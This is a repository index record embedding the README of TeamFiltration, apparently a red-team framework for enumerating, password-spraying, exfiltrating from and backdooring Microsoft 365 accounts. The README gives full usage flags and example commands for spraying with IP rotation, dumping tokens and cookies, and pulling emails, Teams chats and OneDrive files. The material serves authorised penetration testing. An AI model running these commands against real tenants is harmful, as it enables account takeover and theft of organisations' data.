{"id":18831770,"url":"https://github.com/flangvik/teamfiltration","last_synced_at":"2025-05-16T03:04:31.477Z","repository":{"id":56761074,"uuid":"508097028","full_name":"Flangvik/TeamFiltration","owner":"Flangvik","description":"TeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 AAD accounts","archived":false,"fork":false,"pushed_at":"2025-04-10T13:48:00.000Z","size":1405,"stargazers_count":1139,"open_issues_count":4,"forks_count":127,"subscribers_count":11,"default_branch":"main","last_synced_at":"2025-05-12T02:05:17.080Z","etag":null,"topics":[],"latest_commit_sha":null,"homepage":"","language":"C#","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"gpl-3.0","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/Flangvik.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":null,"license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null,"publiccode":null,"codemeta":null}},"created_at":"2022-06-28T00:00:28.000Z","updated_at":"2025-05-10T03:11:08.000Z","dependencies_parsed_at":"2023-02-16T20:00:36.717Z","dependency_job_id":"b500e8db-7be5-44e1-a4fa-8b8f8fed7294","html_url":"https://github.com/Flangvik/TeamFiltration","commit_stats":null,"previous_names":[],"tags_count":13,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FTeamFiltration","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FTeamFiltration/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FTeamFiltration/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/Flangvik%2FTeamFiltration/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/Flangvik","download_url":"https://codeload.github.com/Flangvik/TeamFiltration/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":254459088,"owners_count":22074605,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":[],"created_at":"2024-11-08T01:55:56.281Z","updated_at":"2025-05-16T03:04:31.471Z","avatar_url":"https://github.com/Flangvik.png","language":"C#","funding_links":[],"categories":[],"sub_categories":[],"readme":"\n \u003cp align=\"center\"\u003e\n \u003cimg src=\"TFLogo.png\" width=\"500px\" alt=\"TeamFiltration\" /\u003e\n\u003c/p\u003e\n\n## TeamFiltration\n\nTeamFiltration is a cross-platform framework for enumerating, spraying, exfiltrating, and backdooring O365 EntraID accounts.\nSee the [TeamFiltration](https://github.com/Flangvik/TeamFiltration/wiki/Home) wiki page for an introduction into how TeamFiltration works and the [Quick Start Guide](https://github.com/Flangvik/TeamFiltration/wiki/Home#quick-start-guide) for how to get up and running!\n\nThis tool has been used internally at TrustedSec since January 2021 and was publicly released in my talk [Taking a Dump In The Cloud](https://youtu.be/GpZTQHLKelg) during DefCON30.\n\n## Download\n[You can download the latest precompiled release for Linux, Windows and MacOS ](https://github.com/Flangvik/TeamFiltration/releases/latest) \n\n**The releases are precompiled into a single application-dependent binary. The size go up, but you do not need NET or any other dependencies to run them.**\n\n## Usage\n\n```\n\n ╔╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╗\n ╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬\n╬╬╬╬┤ ╠╬╬╝╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬\n╬╬╬╬╣ │ ╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬\n╬╬╬╬╣ ││ ╚╬╬╝╚ └╚╝╬╬╬╬╬╬\n╬╬╬╬╣ ╔╦╦╬╬╬╬╬╬╦╦╗ ││ │ ╬╬╬╬╬\n╬╬╬╬╣ ╔╬╬╬╝╝┘ ╚╝╝╬╬╬┐ ││ ││ └╬╬╬╬\n╬╬╬╬┤ ╬╬╝╚╩╬╗╔ ╚╬╬╬ ││ ││ ╬╬╬╬\n╬╬╬╬┤ ╬╝ ╚╬╬╗╗ ╔ ╚╬╗ ││ ├││ ╬╬╬╬\n╬╬╬╬┤ ╬╬ ╔╗ ╚╬╬╬╬╬╬╦ ╬╬ │┌ ╔╬┤││ ╔╬╬╬╬\n╬╬╬╬┤ ╔╬┤ ╬╬╬ ╬╬╬╬╬╬╬╬╝╝╝╬╬╗ ╠╬╬╬╬╬╬╬╬╬╗ ┌╬╬╬╬╬\n╬╬╬╬┤ ╬╬┤ ╚╩┘ ╚╬╬╬╬╬╩ ╠╬╬ ╚╝╝╝╝╝╝╝╝╝╬╬╗╗╗╦╬╬╬╬╬╬╬\n╬╬╬╬┤ ╬╬┤ ╠╬╬ ││ ╬╬╬╬╬╬╬╬╬╬╬╬\n╬╬╬╬┤ ╬╬ ╦╗ ╗╗ ╬╬ ││ │ ╬╬╬╬\n╬╬╬╬┤ └╬┐ ╚╬╗╗ ╔╬╬╝ ╔╬┘ ││ │ ╬╬╬╬\n╬╬╬╬┤ └╬╗ ╚╩╩╬╬╬╩╩╝╝ ╔╬╬ ││ │ ╬╬╬╬\n╬╬╬╬┤ ╚╬╬╬╗ ┌╗╬╬╝┘ ││ │ ╬╬╬╬\n╬╬╬╬┤ ╚╩╬╬╬╦╦╦╦╦╦╬╬╬╝╝ ││ │ ╬╬╬╬\n╬╬╬╬┤ ╚╚╝╝╝╝ ││ │ ╬╬╬╬\n╬╬╬╬┤ ││ │ ╔╗╬╬╬╬╬\n╬╬╬╬┤ ││ ╬╦╦╬╬╬╬╬╬╬╬╬\n╬╬╬╬┤ ││ ╔╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬\n╬╬╬╬┤ ╬╬╬╗╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬\n╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬\n └╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╬╝\n ╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝╝\n\n[❤] TeamFiltration V3.5.5 PUBLIC, created by @Flangvik at @TrustedSec\n[+] Args parsed \nUsage:\n\n --outpath Output path to store database and exfiltrated information (Needed for all modules)\n\n --config Local path to your TeamFiltration.json configuration file, if not provided will load from the current path\n\n --exfil Load the exfiltration module\n\n --username Override to target a given username that does not exist in the database\n --password Override to target a given password that does not exist in the database\n --tokens Override to target a (file with newline seperated JWT tokens|single JWT| , seperated JWT tokens) and perfom exfiltration\n --cookie-dump Override to target a given account using it's refresh-cookie-collection\n\n --all Exfiltrate information from ALL SSO resources (Graph, OWA, SharePoint, OneDrive, Teams)\n --aad Exfiltrate information from Graph API (domain users and groups)\n --teams Exfiltrate information from Teams API (files, chatlogs, attachments, contactlist)\n --teams-db Exfiltrate cookies and authentication tokens from an exfiltrated Teams database\n --onedrive Exfiltrate information from OneDrive/SharePoint API (accessible SharePoint files and the users entire OneDrive directory)\n --owa Exfiltrate information from the Outlook REST API (The last 2k emails, both sent and received) \n --owa-limit Set the max amount of emails to exfiltrate, default is 2k.\n --jwt-tokens Dump all gathered JSON formated JTW-tokens for SSO resources (MsGraph,AdGraph, Outlook, SharePoint, OneDrive, Teams)\n\n --spray Load the spraying module\n\n --aad-sso Use SecureWorks's Azure Active Directory password brute-forcing technique when spraying\n --us-cloud When spraying companies attached to US Tenants (https://login.microsoftonline.us/)\n\n --passwords Path to a list of passwords, common weak-passwords will be generated if not supplied\n --exclude Path to a list of emails to exclude from spraying\n --seasons-only Password genersated for spraying will only be based on seasons\n --months-only Password generated for spraying will only be based on months\n --common-only Spray with the top 20 most common passwords\n --shuffle-passwords Shuffle the passwordlist before spraying\n --shuffle-users Shuffle the target userlist before spraying\n --shuffle-regions Shuffle FireProx regions when spraying\n\n --auto-exfil If valid login is found, auto start the exfil module\n\n --sleep-min Minimum minutes to sleep between each full rotation of spraying default=60\n --sleep-max Maximum minutes to sleep between each full rotation of spraying default=100\n --jitter Seconds between each individual authentication attempt. default=0\n --time-window Defines a time windows where spraying should accour, in the military time format \u003c12:00-19:00\u003e\n --push Get Pushover notifications when valid credentials are found (requires pushover keys in config)\n --push-locked Get Pushover notifications when an sprayed account gets locked (requires pushover keys in config)\n --force Force the spraying to proceed even if there is less the \u003csleep\u003e time since the last attempt\n\n --enum Load the enumeration module\n\n --domain Domain to perfom enumeration against, names pulled from statistically-likely-usernames if not provided with --usernames\n --usernames Path to a list of usernames to enumerate (emails)\n --dehashed Use the dehashed submodule in order to enumerate emails from a basedomain\n --validate-msol Validate that the given o365 accounts exists using the public GetCredentialType method (Very RateLimited - Slow 20 e/s)\n --validate-teams Validate that the given o365 accounts exists using the Teams API method (Recommended - Super Fast 300 e/s)\n --validate-login Validate that the given o365 accounts by attemping to login (Noisy - triggers logins - Fast 100 e/s)\n --validate-onedrive Validate that the given o365 accounts using @nyxgeek OneDrive method (Recommended - Fast 300 e/s\n\n --backdoor Loads the interactive backdoor module\n\n --database Loads the interactive database browser module\n\n --debug Proxy all outgoing HTTP requests through the proxy specified in the config\n\n Examples:\n\n --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --spray --sleep-min 120 --sleep-max 200 --push --shuffle-users --shuffle-regions\n --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --spray --push-locked --months-only --exclude C:\\Clients\\FooBar\\Exclude_Emails.txt\n --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --spray --passwords C:\\Clients\\2021\\FooBar\\Generic\\Passwords.txt --time-window 13:00-22:00\n --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --exfil --cookie-dump C:\\\\CookieData.txt --all\n --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --exfil --aad \n --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --exfil --tokens C:\\\\OutputTokens.txt --onedrive --owa\n --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --exfil --teams --owa --owa-limit 5000\n --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --debug --exfil --onedrive\n --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --enum --validate-onedrive --domain example.com\n --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --enum --validate-msol --usernames C:\\Clients\\FooBar\\OSINT\\Usernames.txt\n --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --backdoor\n --outpath C:\\Clients\\FooBar\\TFOutput --config myCustomConfig.json --database\n\n```\n\n## Credits\n\n- [GitHub - KoenZomers/OneDriveAPI: API in .NET to communicate with OneDrive Personal and OneDrive for Business](https://github.com/KoenZomers/OneDriveAPI)\n- [Research into Undocumented Behavior of Azure AD Refresh Tokens ](https://github.com/secureworks/family-of-client-ids-research) \n- [WS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation](https://github.com/ustayready/fireprox)\n- Credits to [Ryan](https://twitter.com/detectdotdev) for validating and discussing my observations / questions!\n- The entire [TrustedSec](https://TrustedSec.com) team for helping me polish this tool! \n- The OneDrive enumeration method found by @nyxgeek and script [onedrive_user_enum](https://github.com/nyxgeek/onedrive_user_enum)\n\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflangvik%2Fteamfiltration","html_url":"https://awesome.ecosyste.ms/projects/github.com%2Fflangvik%2Fteamfiltration","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2Fflangvik%2Fteamfiltration/lists"}